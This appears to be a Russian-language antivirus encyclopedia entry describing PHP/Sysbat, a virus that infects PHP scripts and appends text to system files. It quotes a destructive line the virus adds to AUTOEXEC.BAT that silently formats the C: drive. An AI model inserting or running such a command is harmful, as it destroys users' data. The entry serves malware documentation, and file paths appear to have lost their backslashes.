Sysbat — новый скрипт-вирус, заражающий PHP-программы

PHP/Sysbat заражает скрипт-программы PHP. Язык скриптов PHP (Hypertext Preprocessor scripting language, см. http://www.php.net) предназначен для генерации контента динамических Web-страниц.

После выполнения вирус выдает следующее сообщение:

«This program performed an illegal operation»

Вирус заражает системные файлы, добавляя в их конец различный текст:

• в C:CONFIG.SYS:
  

  47hGHRHjkliliurpIOIPOIporipOOPOirujkJKLLJjHKGJDXmorfic,
  www.shadowvx.com/bcvg, Second PHP VIRUS

• в C:AUTOEXEC.BAT:
  
  

  ctty nul format c: /autotest /q /u

• в C:WINDOWSCOMMAND*.SYS:
  

  Xmorfic_VX_System_PHP_Infector!!